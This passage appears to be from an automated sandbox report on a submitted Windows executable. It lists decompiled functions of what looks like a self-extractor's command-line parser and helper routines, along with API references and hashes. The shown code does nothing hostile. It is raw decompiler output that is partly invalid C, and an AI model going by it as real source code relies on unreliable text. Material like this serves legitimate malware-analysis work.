                                                0x00386249
                                                0x00386255
                                                0x0038625f
                                                0x00386264
                                                0x00386264
                                                0x00386284

                                                APIs
                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0038623F
                                                  • Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
                                                  • Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554
                                                  • Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                • String ID:
                                                • API String ID: 381621628-0
                                                • Opcode ID: 21982a4a1f9218383efc71e96bcb56450b8706037a3ccdae58409d3e8b09af9c
                                                • Instruction ID: 175bac47a831f4578c3ce1ee42abee421348505311b54a9e38f04b4b9b5c7f1a
                                                • Opcode Fuzzy Hash: 21982a4a1f9218383efc71e96bcb56450b8706037a3ccdae58409d3e8b09af9c
                                                • Instruction Fuzzy Hash: 1CF05EB0644308ABEB52FB749D07BBE76BCDB54700F4004EAA986DE191EE7499448750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00384B60(signed int _a4) {
                                                				signed int _t9;
                                                				signed int _t15;
                                                
                                                				_t15 = _a4 * 0x18;
                                                				if( *((intOrPtr*)(_t15 + 0x388d64)) != 1) {
                                                					_t9 = FindCloseChangeNotification( *(_t15 + 0x388d74)); // executed
                                                					if(_t9 == 0) {
                                                						return _t9 | 0xffffffff;
                                                					}
                                                					 *((intOrPtr*)(_t15 + 0x388d60)) = 1;
                                                					return 0;
                                                				}
                                                				 *((intOrPtr*)(_t15 + 0x388d60)) = 1;
                                                				 *((intOrPtr*)(_t15 + 0x388d68)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x388d70)) = 0;
                                                				 *((intOrPtr*)(_t15 + 0x388d6c)) = 0;
                                                				return 0;
                                                			}





                                                0x00384b66
                                                0x00384b74
                                                0x00384b98
                                                0x00384ba0
                                                0x00000000
                                                0x00384bac
                                                0x00384ba4
                                                0x00000000
                                                0x00384ba4
                                                0x00384b78
                                                0x00384b7e
                                                0x00384b84
                                                0x00384b8a
                                                0x00000000

                                                APIs
                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00384FA1,00000000), ref: 00384B98
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: ChangeCloseFindNotification
                                                • String ID:
                                                • API String ID: 2591292051-0
                                                • Opcode ID: 4940aaff82b6fc5edc2af4673c42e28a1e10ebd1a6c4eac26bb881906bef6aaf
                                                • Instruction ID: 2dfd1645e1c44f1897077e9970cd196ac5b0e151cbe4344aedb800e4e273662e
                                                • Opcode Fuzzy Hash: 4940aaff82b6fc5edc2af4673c42e28a1e10ebd1a6c4eac26bb881906bef6aaf
                                                • Instruction Fuzzy Hash: 17F01971540B099E8773EF79CC10552BFE8AA9536036009AEB4AED2591EF309446DBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E003866AE(CHAR* __ecx) {
                                                				unsigned int _t1;
                                                
                                                				_t1 = GetFileAttributesA(__ecx); // executed
                                                				if(_t1 != 0xffffffff) {
                                                					return  !(_t1 >> 4) & 0x00000001;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}




                                                0x003866b1
                                                0x003866ba
                                                0x003866c7
                                                0x003866bc
                                                0x003866be
                                                0x003866be

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(?,00384777,?,00384E38,?), ref: 003866B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: cc4aa4889e09a665decc26172d0d9e15fb3a6013405c0742fb67d072934477bf
                                                • Instruction ID: 2383e649aaa903db1bb6090799f1de1985d383e01e4d6e4bb429f4957d4547d1
                                                • Opcode Fuzzy Hash: cc4aa4889e09a665decc26172d0d9e15fb3a6013405c0742fb67d072934477bf
                                                • Instruction Fuzzy Hash: 61B092B6222A80426A2216316C2A5562845B6C133ABE51BD5F032C01E0DA3EC846D204
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00384CA0(long _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalAlloc(0, _a4); // executed
                                                				return _t2;
                                                			}




                                                0x00384caa
                                                0x00384cb1

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00384CAA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 6729bec4b443afc3c50e0d7ff9010fae4ba84770f1e310921334aa63a6dd0d22
                                                • Instruction ID: f161e1108c90608f5a0bb179b0dd7ac3860f2f58d0067528d2cd5891eabdddd2
                                                • Opcode Fuzzy Hash: 6729bec4b443afc3c50e0d7ff9010fae4ba84770f1e310921334aa63a6dd0d22
                                                • Instruction Fuzzy Hash: F9B0123204430CB7DF011FC2EC09F853F1DE7C4761F240041F60C450508A7294108796
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00384CC0(void* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = GlobalFree(_a4); // executed
                                                				return _t2;
                                                			}




                                                0x00384cc8
                                                0x00384ccf

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                • Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd
                                                Similarity
                                                • API ID: FreeGlobal
                                                • String ID:
                                                • API String ID: 2979337801-0
                                                • Opcode ID: 83989c11a07bf4c49e94ec6904fddfa36be53f4c5c13f286032b75746f50c457
                                                • Instruction ID: 42b33cef5ad6ad73561fd108a9981df92b8474caf5b656170ea44488e5a6d4c3
                                                • Opcode Fuzzy Hash: 83989c11a07bf4c49e94ec6904fddfa36be53f4c5c13f286032b75746f50c457
                                                • Instruction Fuzzy Hash: 96B0123100020CB78F011B42EC088453F1DD6C0360B000051F50C451218B3398118685
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E00385C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				CHAR* _v265;
                                                				char _v266;
                                                				char _v267;
                                                				char _v268;
                                                				CHAR* _v272;
                                                				char _v276;
                                                				signed int _v296;
                                                				char _v556;
                                                				signed int _t61;
                                                				int _t63;
                                                				char _t67;
                                                				CHAR* _t69;
                                                				signed int _t71;
                                                				void* _t75;
                                                				char _t79;
                                                				void* _t83;
                                                				void* _t85;
                                                				void* _t87;
                                                				intOrPtr _t88;
                                                				void* _t100;
                                                				intOrPtr _t101;
                                                				CHAR* _t104;
                                                				intOrPtr _t105;
                                                				void* _t111;
                                                				void* _t115;
                                                				CHAR* _t118;
                                                				void* _t119;
                                                				void* _t127;
                                                				CHAR* _t129;
                                                				void* _t132;
                                                				void* _t142;
                                                				signed int _t143;
                                                				CHAR* _t144;
                                                				void* _t145;
                                                				void* _t146;
                                                				void* _t147;
                                                				void* _t149;
                                                				char _t155;
                                                				void* _t157;
                                                				void* _t162;
                                                				void* _t163;
                                                				char _t167;
                                                				char _t170;
                                                				CHAR* _t173;
                                                				void* _t177;
                                                				intOrPtr* _t183;
                                                				intOrPtr* _t192;
                                                				CHAR* _t199;
                                                				void* _t200;
                                                				CHAR* _t201;
                                                				void* _t205;
                                                				void* _t206;
                                                				int _t209;
                                                				void* _t210;
                                                				void* _t212;
                                                				void* _t213;
                                                				CHAR* _t218;
                                                				intOrPtr* _t219;
                                                				intOrPtr* _t220;
                                                				signed int _t221;
                                                				signed int _t223;
                                                
                                                				_t173 = __ecx;
                                                				_t61 =  *0x388004; // 0xb25159a8
                                                				_v8 = _t61 ^ _t221;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_t209 = 1;
                                                				if(__ecx == 0 ||  *__ecx == 0) {
                                                					_t63 = 1;
                                                				} else {
                                                					L2:
                                                					while(_t209 != 0) {
                                                						_t67 =  *_t173;
                                                						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                							_t173 = CharNextA(_t173);
                                                							continue;
                                                						}
                                                						_v272 = _t173;
                                                						if(_t67 == 0) {
                                                							break;
                                                						} else {
                                                							_t69 = _v272;
                                                							_t177 = 0;
                                                							_t213 = 0;
                                                							_t163 = 0;
                                                							_t202 = 1;
                                                							do {
                                                								if(_t213 != 0) {
                                                									if(_t163 != 0) {
                                                										break;
                                                									} else {
                                                										goto L21;
                                                									}
                                                								} else {
                                                									_t69 =  *_t69;
                                                									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                										break;
                                                									} else {
                                                										_t69 = _v272;
                                                										L21:
                                                										_t155 =  *_t69;
                                                										if(_t155 != 0x22) {
                                                											if(_t202 >= 0x104) {
                                                												goto L106;
                                                											} else {
                                                												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                												_t177 = _t177 + 1;
                                                												_t202 = _t202 + 1;
                                                												_t157 = 1;
                                                												goto L30;
                                                											}
                                                										} else {
                                                											if(_v272[1] == 0x22) {
                                                												if(_t202 >= 0x104) {
                                                													L106:
                                                													_t63 = 0;
                                                													L125:
                                                													_pop(_t210);
                                                													_pop(_t212);
                                                													_pop(_t162);
                                                													return E00386CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                												} else {
                                                													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                													_t177 = _t177 + 1;
                                                													_t202 = _t202 + 1;
                                                													_t157 = 2;
                                                													goto L30;
                                                												}
                                                											} else {
                                                												_t157 = 1;
                                                												if(_t213 != 0) {
                                                													_t163 = 1;
                                                												} else {
                                                													_t213 = 1;
                                                												}
                                                												goto L30;
                                                											}
                                                										}
                                                									}
                                                								}
                                                								goto L131;
                                                								L30:
                                                								_v272 =  &(_v272[_t157]);
                                                								_t69 = _v272;
                                                							} while ( *_t69 != 0);
                                                							if(_t177 >= 0x104) {
                                                								E00386E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                								asm("int3");
                                                								_push(_t221);
                                                								_t222 = _t223;
                                                								_t71 =  *0x388004; // 0xb25159a8
                                                								_v296 = _t71 ^ _t223;
                                                								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                									0x4f0 = 2;
                                                									_t75 = E0038597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                								} else {
                                                									E003844B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                									 *0x389124 = E00386285();
                                                									_t75 = 0;
                                                								}
                                                								return E00386CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                							} else {
                                                								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                								if(_t213 == 0) {
                                                									if(_t163 != 0) {
                                                										goto L34;
                                                									} else {
                                                										goto L40;
                                                									}
                                                								} else {
                                                									if(_t163 != 0) {
                                                										L40:
                                                										_t79 = _v268;
                                                										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                											_t83 = CharUpperA(_v267) - 0x3f;
                                                											if(_t83 == 0) {
                                                												_t202 = 0x521;
                                                												E003844B9(0, 0x521, 0x381140, 0, 0x40, 0);
                                                												_t85 =  *0x388588; // 0x0
                                                												if(_t85 != 0) {
                                                													CloseHandle(_t85);
                                                												}
                                                												ExitProcess(0);
                                                											}
                                                											_t87 = _t83 - 4;
                                                											if(_t87 == 0) {
                                                												if(_v266 != 0) {
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                														_t215 =  &_v268 + _t167;
                                                														_t183 =  &_v268 + _t167;
                                                														_t50 = _t183 + 1; // 0x1
                                                														_t202 = _t50;
                                                														do {
                                                															_t88 =  *_t183;
                                                															_t183 = _t183 + 1;
                                                														} while (_t88 != 0);
                                                														if(_t183 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t205 = 0x5b;
                                                															if(E0038667F(_t215, _t205) == 0) {
                                                																L115:
                                                																_t206 = 0x5d;
                                                																if(E0038667F(_t215, _t206) == 0) {
                                                																	L117:
                                                																	_t202 =  &_v276;
                                                																	_v276 = _t167;
                                                																	if(E00385C17(_t215,  &_v276) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		_t202 = 0x104;
                                                																		E00381680(0x388c42, 0x104, _v276 + _t167 +  &_v268);
                                                																	}
                                                																} else {
                                                																	_t202 = 0x5b;
                                                																	if(E0038667F(_t215, _t202) == 0) {
                                                																		goto L49;
                                                																	} else {
                                                																		goto L117;
                                                																	}
                                                																}
                                                															} else {
                                                																_t202 = 0x5d;
                                                																if(E0038667F(_t215, _t202) == 0) {
                                                																	goto L49;
                                                																} else {
                                                																	goto L115;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													 *0x388a24 = 1;
                                                												}
                                                												goto L50;
                                                											} else {
                                                												_t100 = _t87 - 1;
                                                												if(_t100 == 0) {
                                                													L98:
                                                													if(_v266 != 0x3a) {
                                                														goto L49;
                                                													} else {
                                                														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                														_t217 =  &_v268 + _t170;
                                                														_t192 =  &_v268 + _t170;
                                                														_t38 = _t192 + 1; // 0x1
                                                														_t202 = _t38;
                                                														do {
                                                															_t101 =  *_t192;
                                                															_t192 = _t192 + 1;
                                                														} while (_t101 != 0);
                                                														if(_t192 == _t202) {
                                                															goto L49;
                                                														} else {
                                                															_t202 =  &_v276;
                                                															_v276 = _t170;
                                                															if(E00385C17(_t217,  &_v276) == 0) {
                                                																goto L49;
                                                															} else {
                                                																_t104 = CharUpperA(_v267);
                                                																_t218 = 0x388b3e;
                                                																_t105 = _v276;
                                                																if(_t104 != 0x54) {
                                                																	_t218 = 0x388a3a;
                                                																}
                                                																E00381680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                																_t202 = 0x104;
                                                																E0038658A(_t218, 0x104, 0x381140);
                                                																if(E003831E0(_t218) != 0) {
                                                																	goto L50;
                                                																} else {
                                                																	goto L106;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													_t111 = _t100 - 0xa;
                                                													if(_t111 == 0) {
                                                														if(_v266 != 0) {
                                                															if(_v266 != 0x3a) {
                                                																goto L49;
                                                															} else {
                                                																_t199 = _v265;
                                                																if(_t199 != 0) {
                                                																	_t219 =  &_v265;
                                                																	do {
                                                																		_t219 = _t219 + 1;
                                                																		_t115 = CharUpperA(_t199) - 0x45;
                                                																		if(_t115 == 0) {
                                                																			 *0x388a2c = 1;
                                                																		} else {
                                                																			_t200 = 2;
                                                																			_t119 = _t115 - _t200;
                                                																			if(_t119 == 0) {
                                                																				 *0x388a30 = 1;
                                                																			} else {
                                                																				if(_t119 == 0xf) {
                                                																					 *0x388a34 = 1;
                                                																				} else {
                                                																					_t209 = 0;
                                                																				}
                                                																			}
                                                																		}
                                                																		_t118 =  *_t219;
                                                																		_t199 = _t118;
                                                																	} while (_t118 != 0);
                                                																}
                                                															}
                                                														} else {
                                                															 *0x388a2c = 1;
                                                														}
                                                														goto L50;
                                                													} else {
                                                														_t127 = _t111 - 3;
                                                														if(_t127 == 0) {
                                                															if(_v266 != 0) {
                                                																if(_v266 != 0x3a) {
                                                																	goto L49;
                                                																} else {
                                                																	_t129 = CharUpperA(_v265);
                                                																	if(_t129 == 0x31) {
                                                																		goto L76;
                                                																	} else {
                                                																		if(_t129 == 0x41) {
                                                																			goto L83;
                                                																		} else {
                                                																			if(_t129 == 0x55) {
                                                																				goto L76;
                                                																			} else {
                                                																				goto L49;
                                                																			}
                                                																		}
                                                																	}
                                                																}
                                                															} else {
                                                																L76:
                                                																_push(2);
                                                																_pop(1);
                                                																L83:
                                                																 *0x388a38 = 1;
                                                															}
                                                															goto L50;
                                                														} else {
                                                															_t132 = _t127 - 1;
                                                															if(_t132 == 0) {
                                                																if(_v266 != 0) {
                                                																	if(_v266 != 0x3a) {
                                                																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                																			goto L49;
                                                																		}
                                                																	} else {
                                                																		_t201 = _v265;
                                                																		 *0x389a2c = 1;
                                                																		if(_t201 != 0) {
                                                																			_t220 =  &_v265;
                                                																			do {
                                                																				_t220 = _t220 + 1;
                                                																				_t142 = CharUpperA(_t201) - 0x41;
                                                																				if(_t142 == 0) {
                                                																					_t143 = 2;
                                                																					 *0x389a2c =  *0x389a2c | _t143;
                                                																					goto L70;
                                                																				} else {
                                                																					_t145 = _t142 - 3;
                                                																					if(_t145 == 0) {
                                                																						 *0x388d48 =  *0x388d48 | 0x00000040;
                                                																					} else {
                                                																						_t146 = _t145 - 5;
                                                																						if(_t146 == 0) {
                                                																							 *0x389a2c =  *0x389a2c & 0xfffffffd;
                                                																							goto L70;
                                                																						} else {
                                                																							_t147 = _t146 - 5;
                                                																							if(_t147 == 0) {
                                                																								 *0x389a2c =  *0x389a2c & 0xfffffffe;
                                                																								goto L70;
                                                																							} else {
                                                																								_t149 = _t147;
                                                																								if(_t149 == 0) {
                                                																									 *0x388d48 =  *0x388d48 | 0x00000080;
                                                																								} else {
                                                																									if(_t149 == 3) {
                                                																										 *0x389a2c =  *0x389a2c | 0x00000004;
                                                																										L70:
                                                																										 *0x388a28 = 1;
                                                																									} else {
                                                																										_t209 = 0;
                                                																									}
                                                																								}
                                                																							}
                                                																						}
                                                																					}
                                                																				}
                                                																				_t144 =  *_t220;
                                                																				_t201 = _t144;
                                                																			} while (_t144 != 0);
                                                																		}
                                                																	}
                                                																} else {
                                                																	 *0x389a2c = 3;
                                                																	 *0x388a28 = 1;
                                                																}
                                                																goto L50;
                                                															} else {
                                                																if(_t132 == 0) {
                                                																	goto L98;
                                                																} else {
                                                																	L49:
                                                																	_t209 = 0;
                                                																	L50:
                                                																	_t173 = _v272;
                                                																	if( *_t173 != 0) {
                                                																		goto L2;
                                                																	} else {
                                                																		break;
                                                																	}
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											goto L106;
                                                										}
                                                									} else {
                                                										L34:
                                                										_t209 = 0;
                                                										break;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L131;
                                                					}
                                                					if( *0x388a2c != 0 &&  *0x388b3e == 0) {
                                                						if(GetModuleFileNameA( *0x389a3c, 0x388b3e, 0x104) == 0) {
                                                							_t209 = 0;
                                                						} else {
                                                							_t202 = 0x5c;
                                                							 *((char*)(E003866C8(0x388b3e, _t202) + 1)) = 0;
                                                						}
                                                					}
                                                					_t63 = _t209;
                                                				}
                                                				L131:
                                                			}


































































                                                0x00385c9e
                                                0x00385ca9
                                                0x00385cb0
                                                0x00385cb3
                                                0x00385cb6
                                                0x00385cb7
                                                0x00385cb8
                                                0x00385cbd
                                                0x00386204
                                                0x00385ccb
                                                0x00000000
                                                0x00385ccb
                                                0x00385cd3
                                                0x00385cd7
                                                0x00385cf4
                                                0x00000000
                                                0x00385cf4
                                                0x00385cf8
                                                0x00385d00
                                                0x00000000
                                                0x00385d06
                                                0x00385d06
                                                0x00385d0e
                                                0x00385d10
                                                0x00385d12
                                                0x00385d14
                                                0x00385d15
                                                0x00385d17
                                                0x00385d49
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385d19
                                                0x00385d19
                                                0x00385d1d
                                                0x00000000
                                                0x00385d3f
                                                0x00385d3f
                                                0x00385d4b
                                                0x00385d4b
                                                0x00385d4f
                                                0x00385d8d
                                                0x00000000
                                                0x00385d93
                                                0x00385d93
                                                0x00385d9a
                                                0x00385d9d
                                                0x00385d9e
                                                0x00000000
                                                0x00385d9e
                                                0x00385d51
                                                0x00385d5b
                                                0x00385d72
                                                0x003860fb
                                                0x003860fb
                                                0x00386207
                                                0x0038620a
                                                0x0038620b
                                                0x0038620e
                                                0x00386217
                                                0x00385d78
                                                0x00385d78
                                                0x00385d80
                                                0x00385d83
                                                0x00385d84
                                                0x00000000
                                                0x00385d84
                                                0x00385d5d
                                                0x00385d5f
                                                0x00385d62
                                                0x00385d68
                                                0x00385d64
                                                0x00385d64
                                                0x00385d64
                                                0x00000000
                                                0x00385d62
                                                0x00385d5b
                                                0x00385d4f
                                                0x00385d1d
                                                0x00000000
                                                0x00385d9f
                                                0x00385d9f
                                                0x00385da5
                                                0x00385dab
                                                0x00385dba
                                                0x00386218
                                                0x0038621d
                                                0x00386220
                                                0x00386221
                                                0x00386229
                                                0x00386230
                                                0x00386247
                                                0x0038626a
                                                0x00386272
                                                0x00386249
                                                0x00386255
                                                0x0038625f
                                                0x00386264
                                                0x00386264
                                                0x00386284
                                                0x00385dc0
                                                0x00385dc0
                                                0x00385dca
                                                0x00385e22
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385dcc
                                                0x00385dce
                                                0x00385e24
                                                0x00385e24
                                                0x00385e2c
                                                0x00385e47
                                                0x00385e4a
                                                0x003861d2
                                                0x003861e2
                                                0x003861e7
                                                0x003861ee
                                                0x003861f1
                                                0x003861f1
                                                0x003861f8
                                                0x003861f8
                                                0x00385e50
                                                0x00385e53
                                                0x00386109
                                                0x0038611f
                                                0x00000000
                                                0x00386125
                                                0x00386137
                                                0x0038613a
                                                0x0038613c
                                                0x0038613e
                                                0x0038613e
                                                0x00386141
                                                0x00386141
                                                0x00386143
                                                0x00386144
                                                0x0038614a
                                                0x00000000
                                                0x00386150
                                                0x00386152
                                                0x0038615c
                                                0x00386170
                                                0x00386172
                                                0x0038617c
                                                0x00386190
                                                0x00386190
                                                0x00386196
                                                0x003861a5
                                                0x00000000
                                                0x003861ab
                                                0x003861b9
                                                0x003861c6
                                                0x003861c6
                                                0x0038617e
                                                0x00386180
                                                0x0038618a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038618a
                                                0x0038615e
                                                0x00386160
                                                0x0038616a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0038616a
                                                0x0038615c
                                                0x0038614a
                                                0x0038610b
                                                0x0038610e
                                                0x0038610e
                                                0x00000000
                                                0x00385e59
                                                0x00385e59
                                                0x00385e5c
                                                0x0038604f
                                                0x00386056
                                                0x00000000
                                                0x0038605c
                                                0x0038606e
                                                0x00386071
                                                0x00386073
                                                0x00386075
                                                0x00386075
                                                0x00386078
                                                0x00386078
                                                0x0038607a
                                                0x0038607b
                                                0x00386081
                                                0x00000000
                                                0x00386087
                                                0x00386087
                                                0x0038608d
                                                0x0038609c
                                                0x00000000
                                                0x003860a2
                                                0x003860aa
                                                0x003860b2
                                                0x003860b7
                                                0x003860bd
                                                0x003860bf
                                                0x003860bf
                                                0x003860d6
                                                0x003860e0
                                                0x003860e7
                                                0x003860f5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x003860f5
                                                0x0038609c
                                                0x00386081
                                                0x00385e62
                                                0x00385e62
                                                0x00385e65
                                                0x00385fd3
                                                0x00385fe9
                                                0x00000000
                                                0x00385fef
                                                0x00385fef
                                                0x00385ff7
                                                0x00385ffd
                                                0x00386003
                                                0x00386006
                                                0x00386011
                                                0x00386014
                                                0x0038603d
                                                0x00386016
                                                0x00386018
                                                0x00386019
                                                0x0038601b
                                                0x00386033
                                                0x0038601d
                                                0x00386020
                                                0x00386029
                                                0x00386022
                                                0x00386022
                                                0x00386022
                                                0x00386020
                                                0x0038601b
                                                0x00386042
                                                0x00386044
                                                0x00386046
                                                0x0038604a
                                                0x00385ff7
                                                0x00385fd5
                                                0x00385fd8
                                                0x00385fd8
                                                0x00000000
                                                0x00385e6b
                                                0x00385e6b
                                                0x00385e6e
                                                0x00385f8b
                                                0x00385f99
                                                0x00000000
                                                0x00385f9f
                                                0x00385fa7
                                                0x00385faf
                                                0x00000000
                                                0x00385fb1
                                                0x00385fb3
                                                0x00000000
                                                0x00385fb5
                                                0x00385fb7
                                                0x00000000
                                                0x00385fb9
                                                0x00000000
                                                0x00385fb9
                                                0x00385fb7
                                                0x00385fb3
                                                0x00385faf
                                                0x00385f8d
                                                0x00385f8d
                                                0x00385f8d
                                                0x00385f8f
                                                0x00385fc1
                                                0x00385fc1
                                                0x00385fc1
                                                0x00000000
                                                0x00385e74
                                                0x00385e74
                                                0x00385e77
                                                0x00385ea0
                                                0x00385ebd
                                                0x00385f79
                                                0x00000000
                                                0x00385f7f
                                                0x00385ec3
                                                0x00385ec3
                                                0x00385ecc
                                                0x00385ed4
                                                0x00385ed6
                                                0x00385edc
                                                0x00385edf
                                                0x00385eea
                                                0x00385eed
                                                0x00385f3f
                                                0x00385f40
                                                0x00000000
                                                0x00385eef
                                                0x00385eef
                                                0x00385ef2
                                                0x00385f34
                                                0x00385ef4
                                                0x00385ef4
                                                0x00385ef7
                                                0x00385f2b
                                                0x00000000
                                                0x00385ef9
                                                0x00385ef9
                                                0x00385efc
                                                0x00385f22
                                                0x00000000
                                                0x00385efe
                                                0x00385eff
                                                0x00385f02
                                                0x00385f16
                                                0x00385f04
                                                0x00385f07
                                                0x00385f0d
                                                0x00385f46
                                                0x00385f46
                                                0x00385f09
                                                0x00385f09
                                                0x00385f09
                                                0x00385f07
                                                0x00385f02
                                                0x00385efc
                                                0x00385ef7
                                                0x00385ef2
                                                0x00385f4c
                                                0x00385f4e
                                                0x00385f50
                                                0x00385f54
                                                0x00385ed4
                                                0x00385ea2
                                                0x00385ea4
                                                0x00385eaf
                                                0x00385eaf
                                                0x00000000
                                                0x00385e79
                                                0x00385e7d
                                                0x00000000
                                                0x00385e83
                                                0x00385e83
                                                0x00385e83
                                                0x00385e85
                                                0x00385e85
                                                0x00385e8e
                                                0x00000000
                                                0x00385e94
                                                0x00000000
                                                0x00385e94
                                                0x00385e8e
                                                0x00385e7d
                                                0x00385e77
                                                0x00385e6e
                                                0x00385e65
                                                0x00385e5c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00385dd0
                                                0x00385dd0
                                                0x00385dd0
                                                0x00000000
                                                0x00385dd0
                                                0x00385dce
                                                0x00385dca
                                                0x00385dba
                                                0x00000000
                                                0x00385d00
                                                0x00385dd9
                                                0x00385e04
                                                0x003861fe
                                                0x00385e0a
                                                0x00385e0c
                                                0x00385e17
                                                0x00385e17
                                                0x00385e04
